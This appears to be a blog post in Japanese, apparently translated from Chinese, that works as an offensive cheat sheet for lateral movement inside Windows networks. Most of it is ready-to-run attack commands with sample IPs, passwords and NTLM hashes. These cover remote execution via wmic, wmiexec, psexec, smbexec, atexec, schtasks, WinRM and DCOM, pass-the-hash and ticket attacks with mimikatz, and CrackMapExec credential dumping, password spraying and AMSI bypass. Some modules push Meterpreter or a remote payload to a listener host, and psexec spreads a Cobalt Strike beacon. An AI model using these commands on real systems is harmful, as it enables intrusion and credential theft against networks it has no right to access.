banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。

内網浸透の基礎

内網#

内網とは、内部のローカルエリアネットワーク、一般的に言われる LAN(ローカルエリアネットワーク)を指します。一般的な家庭用 Wi-Fi ネットワークや小規模な企業ネットワークでは、通常、内部のコンピュータが直接ルーターにアクセスし、ルーターが移動通信の光ファイバーに接続してインターネットに接続します。

image

内部のローカルエリアネットワークは、スイッチやファイアウォールを介して複数のネットワーク(セグメント)を構成し、複数のセグメント間でアクセス制御を行うことができます。新しい概念(セキュリティドメイン)。

image

サーバーを専用に保存する場所は DMZ(非武装地帯)と呼ばれ、運用管理エリア、内網オフィスエリアなどがあります。一般的に言われる内網侵入は、ローカルエリアネットワーク内部での侵入を指し、内網侵入で比較的難易度が高いのはドメイン侵入です

KB2871997&KB2928120#

マイクロソフトは 2014 年にKB2871997KB2928120の 2 つのパッチをリリースし、ドメイン内のホストのローカルユーザーによるネットワークログインを防止しました。これにより、ローカル管理者の権限でwmi、psexec、schtasks、atおよびファイルアクセス共有を実行することができなくなりました。ローカルユーザーの PTH 方式はすでに無効になっていますが、デフォルトの Administrator(SID 500)アカウントは依然として PTH を実行でき、NTLM を無効にした場合、psexec はリモート接続を行うことができませんが、mimikatz を使用することで攻撃が成功します。

UNC パス#

UNC パスはユニバーサルネーミングコンベンションパス(Universal Naming Convention)を表し、ネットワーク上で共有されているリソースの位置を識別するためのネットワークパス形式です。UNC パスを使用すると、ローカルネットワーク内でリモート共有にアクセスできます。

UNC パスは、2 つのバックスラッシュ\の後に、リモートコンピュータの名前または IP アドレス、オプションの共有名、オプションのパスおよびファイル名が続きます。例えば:

\\ComputerName\ShareName\Path\FileName

ここで、ComputerName はリモートコンピュータの名前または IP アドレス、ShareName は共有名で、共有にアクセスする際に使用する必要があります。Path は共有フォルダ内のパス、FileName は必要なファイルの名前です。

WMI#

WMI(Windows Management Instrumentation)は、Windows システムを管理するための方法と機能を説明することができ、私たちはこれを API として Win システムと相互に通信するために使用できます。WMI は、ペネトレーションテストにおける価値は、ダウンロードやインストールを必要とせず、WMI は Windows システムに組み込まれた機能です。また、全体の実行プロセスはコンピュータのメモリ内で発生し、痕跡を残しません。

135 ポート#

RPC:リモートプロシージャコールサービス、WMIC(Windows Management Instrumentation)がこのポートを使用します。

image

wmic の具体的な使用法は以下の通りです:

# 電卓を開く
wmic /node:ip /user:ユーザー名 /password:パスワード PROCESS call create "calc.exe" 

# 無回显
wmic /node:192.168.1.56 /user:administrator /password:aab+1s PROCESS call create "calc.exe"
wmic /node:192.168.1.56 /user:administrator /password:aab+1s process call create "cmd.exe /c ipconfig >C:\1.txt"

接続エラーのメッセージは以下の通りです:

image

IP が間違っている場合のメッセージは以下の通りです:

image

パスワードが間違っている場合のメッセージは以下の通りです:

image

別のコンピュータで接続を試みたところ、正常にアクセスでき、コマンドが成功裏に実行され、wmic 実行後は無回显で、テキストファイルに書き込む必要があります。

image

image

WMIEXEC#

インタラクティブシェルを取得します。

cscript.exe //nologo wmiexec.vbs /shell 192.168.1.56 administrator aab+1s

image

単一コマンドを実行します。

cscript.exe //nologo wmiexec.vbs /cmd 192.168.1.56 administrator aab+1s "cmdkey /list"

image

上記はパスワードを提供しました。パスワードがない場合は、wce のハッシュ注入を利用し、その後 wmiexec を実行すればよいです。

wce –s アカウント:ホスト名またはドメイン名:LM:NTLM

cscript //nologo wmiexec.vbs /shell 192.168.0.1

もし取得した LM ハッシュが AAD3 で始まる場合や No Password のようなものであれば、32 個の 0 で LM ハッシュを置き換えます。

wmiexec.exe#

wmiexec.exe ./administrator:[email protected] "whoami"

image

ハッシュを渡します。

wmiexec.exe -hashes 00000000000000000000000000000000:04cea78fa35a5be51f4aee6375651e8a WIN-P6KD23KACIJ/[email protected] "ipconfig"

https://github.com/rootclay/WMIHACKER/blob/master/README_zh.md

137、138、139 ポート#

137、138 は UDP ポートで、主に内網でファイルを転送するために使用され、NetBios/SMB サービスの取得は主に 139 ポートを介して行われます。

445 ポート#

共有フォルダ、共有プリンター

ipc$#

IPC$は共有「名前付きパイプ」のリソースであり、プロセス間通信を可能にするために開放された名前付きパイプです。信頼できるユーザー名とパスワードを提供することで、接続双方は安全なチャネルを確立し、そのチャネルを通じて暗号化されたデータの交換を行い、リモートコンピュータへのアクセスを実現します。これは NT/2000 から使用されています。

IPC$は同時に、2 つの IP 間で 1 つの接続のみを許可します。

NT/2000 はipc$機能を提供する際、初回システムインストール時にデフォルト共有を開放しました。すなわち、すべての論理共有(c$,d$,e$……)およびシステムディレクトリ winnt または管理者ディレクトリ(admin$)が共有されます。

net use \\192.168.1.56\c$ "password" /user:"domain\username"
net use \\192.168.1.56\c$ "aab+1s" /user:administrator

image

別のホストで net use リモート接続

image

拡張構文#

net use \\192.168.1.56\c$

# ipc$接続を削除
net use \\192.168.1.56\ipc$ /del

# 目的のディスクをローカルにマッピング
net use z: \\192.168.1.56\c$

# マッピングを削除
net use z: /del

# 共有を閉じる
net use ipc$ /del

ipc$ 空接続

横方向の侵入 SMB(445 ポートを介して)#

SMB サービスを利用するには、まず IPC を確立する必要があります。ハッシュを渡してリモート実行を行うことができ、デフォルトでは System 権限が戻ります。ターゲットのファイアウォールは 445 を開放し、通過を許可する必要があります。

psexec#

net use \\192.168.1.56\c$ "aab+1s" /user:administrator

PsExec.exe \\192.168.1.56 whoami

.\PsExec.exe -u administrator -p 123456 \\dc01 cmd

# インタラクティブシェル(同じ資格情報で直接ログイン可能)
psexec -accepteula \\ip -s cmd.exe

image

実行原理

  1. ipc$接続を介して、psexecsvc.exeをターゲットに解放します。
  2. サービス管理SCManagerを介してリモートでpsexecsvcサービスを作成し、サービスを起動します。
  3. クライアントがコマンドを実行し、サーバーが対応するプログラムを起動し、実行結果を返します。
  4. 実行後、サービスを削除します。これは Windows のログに詳細に記録されます。また、psexec は稀にサービスが正常に削除されないバグが発生するため、一般的には psexec の使用は推奨されず、wmiexec が推奨されます。
C:\WINDOWS\Temp\PsExec.exe -accepteula \\192.168.144.155,192.168.144.196 -u administrator -p admin@123 -d -c C:\WINDOWS\Temp\beacon.exe

image

cs - プラグイン#

横方向に侵入するホストを選択し、jump-psexec64

image

image

認証を選択し、リスナーがネットワークに出られる場合は 1 を選択し、内網横方向の場合は smb beacon2 を使用します。

コマンドラインを直接使用します。

jump [module] [target] [listener]
jump psexec64 192.168.10.173 local

image

psexec を使用してターゲットマシンに横方向に侵入し、資格情報は既知の資格情報を使用して衝突させます。
image

この時、全体のトポロジーは以下の通りで、親子関係です。これは http beacon を使用して teamserver に直接接続しているためで、smb beacon を使用するとリンク関係になります。

image

smb beacon に切り替えます。

image

ホスト IP の後に 4 つの円があります。

image

smb の矢印は黄色です。

https://www.cnblogs.com/sup3rman/p/12381874.html

SMBEXEC#

明文渡し

smbexec.exe administrator:[email protected]

image

ハッシュ渡し

ハッシュ渡し:
smbexec -hashes :$HASH$ [email protected]
smbeexec -hashes :$HASH$ domain/[email protected]

ハッシュをダンプします。

image

image

atexec#

  • バッチ処理
FOR /F %%i in (ips.txt) do net use \\%%i\ipc$ "admin!@#45" /user:administrator #バッチ検出 IP 対応明文 接続 

FOR /F %%i in (ips.txt) do atexec.exe ./administrator:admin!@#45@%%i whoami #バッチ検出 IP 対応明文 回显版 

FOR /F %%i in (pass.txt) do atexec.exe ./administrator:%%[email protected] whoami #バッチ検出明文対応 IP 回显版 

FOR /F %%i in (hash.txt) do atexec.exe -hashes :%%i ./[email protected] whoami #バッチ検出 HASH 対応 IP 回显版  

PTH#

ドメイン / ワークグループ環境では、メモリ内に現在のマシンと同じパスワードが存在します。認証プロセスの基本的な流れは、ユーザーからパスワードを収集し、それを暗号化し、正しいパスワードの暗号化ハッシュを将来の認証に使用することです。

初回認証後、Windows はハッシュ値をメモリに保存し、ユーザーは何度もパスワードを入力する必要がなくなります。

資格情報のダンプ中に、大量のハッシュ値を抽出したことがわかります。今、攻撃者としては、パスワードがわからないため、認証中にパスワードの代わりにハッシュを提供します。

Windows はハッシュ値を比較し、攻撃者を歓迎します。簡単に言えば、これが Pass-the-Hash 攻撃です。

https://www.hackingarticles.in/lateral-movement-pass-the-hash-attack/

mimikatz - PTH#

privilege::debug 
sekurlsa::pth /user:Administrator /domain:WIN-P6KD23KACIJ /ntlm:04cea78fa35a5be51f4aee6375651e8a

image

ポップアップ後、共有ポートに接続し、ファイルを転送します。

# privilege::debug
# sekurlsa::pth /user:Administrator /domain:WIN-P6KD23KACIJ /ntlm:04cea78fa35a5be51f4aee6375651e8a

image

ファイルをコピー

image

参考:
内網侵入 -- ハッシュ渡し攻撃

PTK#

パッチkb2871997が存在する必要があります。

minikatzを使用してaes256_hmacを取得:
sekurlsa::ekeys
渡し接続:sekurlsa::pth /user:mary/domain:hsyy.com/aes256:d7c1d9310753a2f7f240e5b2701dc1e6177d16a6e40af3c5cdff814719821c4b  

PTT#

実行手順:  
1、チケットを生成する kekeo “tgt::ask /user:mary /domain:hsyy.com /ntlm:518b98ad4178a53695dc997aa02d455c”  
2、チケットをインポートする kerberos::ptt [[email protected]_krbtgt](mailto:[email protected]_krbtgt)[email protected]  
3、資格情報を確認する klist  
4、net useを利用して dir \192.168.213.163\c$をマウント  

smbclient#

認証ログイン#

  • 明文
smbclient -L //192.168.10.173 -U Administrator
  • ハッシュ
smbclient.exe -hashes 00000000000000000000000000000000:04cea78fa35a5be51f4aee6375651e8a WIN-P6KD23KACIJ/[email protected]

image

空セッション列挙#

smbclient -N -U "" -L \\192.168.1.214

rpcclient#

# rpcclient -U "" -N 10.10.10.161 
rpcclient $>enumdomusers

# rpcclient -U corp.pentest.lab/administrator 10.10.10.161 

cme#

https://mpgn.gitbook.io/crackmapexec/getting-started/installation/installation-on-windows

コマンドを実行#

crackmapexec smb 192.168.10.173 -u administrator -H 04cea78fa35a5be51f4aee6375651e8a -x ipconfig

image

powershell

#~ crackmapexec 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable'

ASMI をバイパス

#~ crackmapexec 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable'  --amsi-bypass /path/payload

image

cme ネットワークスキャン#

crackmapexec smb 10.0.0.0/24

image

crackmapexec smb 192.168.10.173 -u administrator -p aab+1s --shares
crackmapexec smb 192.168.10.83 -u airs-win7 -p aab+1s --shares
crackmapexec smb 192.168.10.83 -u airs-win7 -H 04cea78fa35a5be51f4aee6375651e8a --shares 

image

空セッションの列挙#

cme smb 10.10.10.161 -u '' -p ''
cme smb 10.10.10.161 --pass-pol
cme smb 10.10.10.161 --users
cme smb 10.10.10.161 --groups

cme smb 10.10.10.178 -u 'a' -p '' -shares
cme smb 10.10.10.178 -u -p -shares

# すべての共有を再帰的に列挙
crackmapexec smb  -u  -p  -M spider_plus

資格情報の取得#

crackmapexec smb 192.168.10.173 -u administrator -p aab+1s --sam  
crackmapexec smb 192.168.10.173 -u administrator -p aab+1s --lsa
crackmapexec smb 192.168.10.173 -u administrator -p aab+1s --ntds
crackmapexec smb 192.168.10.173 -u administrator -p aab+1s --ntds vss

msf リバウンドシェル#

image

リモートターゲット上のアクティブセッションを列挙#

#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sessions

#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --shares

パスワードスプレー#

スペースを使用して複数のユーザー名 / パスワードを指定します。

#~ cme smb 192.168.1.101 -u user1 user2 user3 -p Summer18
#~ cme smb 192.168.1.101 -u user1 -p password1 password2 password3

テキストを使用して辞書を指定します。

#~ cme smb 192.168.1.101 -u /path/to/users.txt -p Summer18
#~ cme smb 192.168.1.101 -u Administrator -p /path/to/passwords.txt

パスワードが見つかった後、ブレークを続けます。

#~ cme smb 192.168.1.101 -u /path/to/users.txt -p Summer18 --continue-on-success

# 一対一のブレーク
#~ cme smb 192.168.1.101 -u user.txt -p password.txt --no-bruteforce --continue-on-succes

認証#

  • ドメイン

User/Hash

資格情報を取得するには、以下のようにします:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c:::
#~ cme smb 192.168.1.0/24 -u UserNAme -H 'LM:NT'
#~ cme smb 192.168.1.0/24 -u UserNAme -H 'NTHASH'
#~ cme smb 192.168.1.0/24 -u Administrator -H '13b29964cc2480b4ef454c59562e675c'
#~ cme smb 192.168.1.0/24 -u Administrator -H 'aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c'
  • ローカル認証
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --local-auth
#~ cme smb 192.168.1.0/24 -u '' -p '' --local-auth
#~ cme smb 192.168.1.0/24 -u UserNAme -H 'LM:NT' --local-auth
#~ cme smb 192.168.1.0/24 -u UserNAme -H 'NTHASH' --local-auth
#~ cme smb 192.168.1.0/24 -u localguy -H '13b29964cc2480b4ef454c59562e675c' --local-auth
#~ cme smb 192.168.1.0/24 -u localguy -H 'aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c' --local-auth

ブレーク結果は以下の通りです:

	SMB         192.168.1.101    445    HOSTNAME          [+] HOSTNAME\Username:Password (Pwn3d!)  

winRM#

#~ cme winrm 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforce
# 最新のリリースを使用してください。CMEはすべての依存関係を含むバイナリパッケージです
root@payload$ wget https://github.com/byt3bl33d3r/CrackMapExec/releases/download/v5.0.1dev/cme-ubuntu-latest.zip

# cmeを実行します(smb、winrm、mssqlなど)
root@payload$ cme smb -L
root@payload$ cme smb -M name_module -o VAR=DATA
root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --local-auth
root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --shares
root@payload$ cme smb 192.168.1.100 -u Administrator -H ':5858d47a41e40b40f294b3100bea611f' -d 'DOMAIN' -M invoke_sessiongopher
root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable
root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443
root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" -M web_delivery -o URL="https://IP:PORT/posh-payload"
root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -X 'whoami'
root@payload$ cme smb 10.10.14.0/24 -u user -p 'Password' --local-auth -M mimikatz
root@payload$ cme mimikatz --server http --server-port 80

at、schtasks、#

  • at

Windows バージョン<2012、高バージョンでは schtasks コマンドを使用します。

at [\computername] [[id] [/delete] | /delete [/yes]]
at [\computername] <time> [/interactive] [/every:date[,...] | /next:date[,...]] <command>

smb beacon を生成します。

image

smb beacon ファイルをアップロードします。

image

タスクスケジュールを追加します。

shell at \\192.168.10.173 10:51 c:\local-smb.exe

image

実行中で、リバウンドできず、smb シェルの問題です。

web beacon に切り替えたところ、成功裏にリバウンドしました。

image

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/at

  • schtasks

windows>=2012

schtasks create

実行ファイルに対応するタスクを作成します。

schtasks /create /sc <scheduletype> /tn <taskname> /tr <taskrun> [/s <computer> [/u [<domain>\]<user> [/p <password>]]] [/ru {[<domain>\]<user> | system}] [/rp <password>] [/mo <modifier>] [/d <day>[,<day>...] | *] [/m <month>[,<month>...]] [/i <idletime>] [/st <starttime>] [/ri <interval>] [{/et <endtime> | /du <duration>} [/k]] [/sd <startdate>] [/ed <enddate>] [/it] [/z] [/f]
schtasks /create /s 192.168.213.163 /ru "SYSTEM" /tn adduser /sc DAILY /tr c:\user.bat /F

schtasks run

実行ファイルタスクを実行します。

schtasks /run /s 192.168.213.163 /tn adduser /i

schtasks delete

実行ファイルタスクを削除します。

schtasks /delect /s 192.168.213.163 /tn adduser /f

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create


sharpwmi#

.\sharpwmi.exe login 192.168.10.1/24 administrator aab+1s cmd whoami

image

cs エラー

[-] Invoke_3 on EntryPoint failed.

image

nbtscan#

IP を介してネットワークをスキャンし、bios 名(コンピュータ名)を取得します。

image

image

bash$ sudo nbtscan -v -s : 192.168.1.0/24
  • cs プラグイン

image

winRM#

WinRM(Windows Remote Management)は、WS 管理プロトコルの Microsoft 実装であり、標準の SOAP プロトコルに基づいて、異なるベンダーのハードウェアとオペレーティングシステムが相互に操作できるようにします。ローカルまたはリモートのサーバーを管理し、Telnet に似たインタラクティブなコマンドラインシェルを取得することができ、システム管理者の複雑な操作を軽減します。

ポート:
HTTP(5985)
HTTPS SOAP(5986)

前提条件:資格情報と権限

CS には WinRM モジュールがあります。

image

winrm:x86、WinRM を介して PowerShell スクリプトを実行します。
winrm:x64、WinRM を介して PowerShell スクリプトを実行します。

winrm64 に入ると、内容は以下の通りです:

image

前提条件として認証が必要で、これにより横方向に侵入できます。この認証の取得は、内部の衝突、過去の RDP 資格情報などの方法で行うことができます。内部の衝突は、既知のパスワードを使用して再利用パスワードの有無を確認することを指し、過去の RDP 資格情報は、管理者が内網で 3389 でログインした後にパスワードを記録した場合、過去の RDP ログイン記録を取得して資格情報を得ることができます。

上の図のように、192.168.1.214 のパスワード資格情報を持っていますが、192.168.1.55 の資格情報は不明な場合、192.168.1.214 の資格情報を使用して試すことができます。

リスナーとセッションは必要に応じて選択し、セッションは現在の beacon です。

image

実行を試みたところ、エラーが発生しました。

jump winrm64 192.168.1.55 test

image

サーバーのポート状況を確認したところ、5985 ポートが開いていませんでした。

image

winrm コマンドを使用して 5985 ポートを開放できます。Windows Server 2008 では、デフォルトで winrm サービスが起動していますが、ポートは開放されていないため、winrm quickconfig -qまたはwinrm qcでポートを開放する必要があります。

image

  • winRM サービスを開放します。

image

ポートの開放状況を再確認したところ、5985 ポートが開放されました。

image

  • ファイアウォールを開放するか、ファイアウォールを閉じるコマンド
C:\Windows\system32>netsh advfirewall firewall set rule group="Windows 远程管理" new enable=yes
  • PowerShell を使用してサーバーに接続します。

信頼できるホストを事前に開放する必要があります。

PS C:\Users\Administrator> Set-Item wsman:\localhost\Client\TrustedHosts -value 192.168.1.* -Force
# このコマンドはクライアントで実行する必要があります。サーバーではなく。

または以下のコマンドを使用します。
winrm set winrm/config/client @{TrustedHosts="*"}

PS C:\Users\Administrator> Enter-PSSession 192.168.1.55 -Credential administrator


![](https://raw.githubusercontent.com/olist213/olistimg/master/picgo/202306091119252.png)

![](https://raw.githubusercontent.com/olist213/olistimg/master/picgo/202306091119010.png)

資格情報を入力し、接続に成功しました。

![](https://raw.githubusercontent.com/olist213/olistimg/master/picgo/202306091119277.png)

または

```bash
New-PSSession -ComputerName 192.168.1.55 -Credential (Get-Credential)
Enter-PSSession 1

image

CS を介して操作します。

beacon> jump winrm64 192.168.1.55 test

image

成功裏にシェルが返されました。

image

修正提案:

WinRM を無効にします。

winrm delete winrm/config/listener?IPAdress=*+Transport=HTTP
  • ⚠️ Windows 8、Windows 10、Windows Server 2012 以降のシステムでは、WinRM サービスがデフォルトで有効になっています。

evil-winrm#

GitHub - Hackplayers/evil-winrm: The ultimate WinRM shell for hacking/pentesting

WinRS#

WinRS(Windows Remote Shell)は、Windows リモートサーバー上でコマンドラインコマンドを実行するためのリモート管理ツールです。WinRS は WinRM(Windows Remote Management)プロトコルを使用してリモートコンピュータにコマンドラインリクエストを送信します。WinRS は Windows Server 2008 以降のオペレーティングシステムにプリインストールされており、Windows 7 以降のオペレーティングシステムで有効にできます。WinRS を使用するには、リモートサーバーで WinRM を有効にし、ローカルコンピュータでコマンドを実行する際に管理者権限を使用する必要があります。

winrs -r:192.168.1.55 "cmd /c ipconfig"

image

# ポート再利用下
winrs -r:http://192.168.1.55 -u:administrator -p:aab+1s whoami
winrs -r:http://192.168.1.55 -u:administrator -p:aab+1s cmd

DCOM#

DCOM は分散コンポーネントオブジェクトモデル(Distributed Component Object Model)の略で、Microsoft の分散システムサービスです。これにより、コンピュータ上のアプリケーションがネットワークを介して接続し、通信することができます。DCOM は、開発者がリモートコンピュータ上でコードを実行し、アプリケーション間の通信をより容易かつ柔軟にします。

PS C:\Users\Administrator> Get-ChildItem 'registry::HKEY_CLASSES_ROOT\WOW6432Node\CLSID\{49B2791A-B1AE-4C90-9B8E-E860BA07F889}'

image

PS C:\Users\Administrator> $a = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","192.168.1.55"))

PS C:\Users\Administrator> $a.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c hostname > c:\fromdcom.txt","7")

PS C:\Users\Administrator> Get-Content \\192.168.1.55\c$\fromdcom.txt
WIN-BVVD8VFVMPR

image

SCShell#

GitHub - Mr-Un1k0d3r/SCShell: Fileless lateral movement tool that relies on ChangeServiceConfigA to run command

No445#

GitHub - JDArmy/NO445-lateral-movement: command execute without 445 port

参考#

https://www.redteam101.tech/offensive-security/lateral-movement/shi-yong-scshell-jin-hang-heng-xiang-yi-dong
https://github.com/BlWasp/CME_cheatSheet
https://mpgn.gitbook.io/crackmapexec/
https://www.hackingarticles.in/lateral-moment-on-active-directory-crackmapexec/
https://www.hackingarticles.in/lateral-movement-over-pass-the-hash/
https://www.hackingarticles.in/lateral-movement-pass-the-hash-attack/
http://www.kxsy.work/2022/02/14/nei-wang-shen-tou-zui-shi-yong-de-heng-xiang-yi-dong-zong-jie/
https://www.cnblogs.com/gamewyd/p/6805595.html
https://www.cnblogs.com/zhengna/p/15309006.html
http://k8gege.org/Ladon/WinrmScan.html
https://cloud.tencent.com/developer/article/1937116

読み込み中...
文章は、創作者によって署名され、ブロックチェーンに安全に保存されています。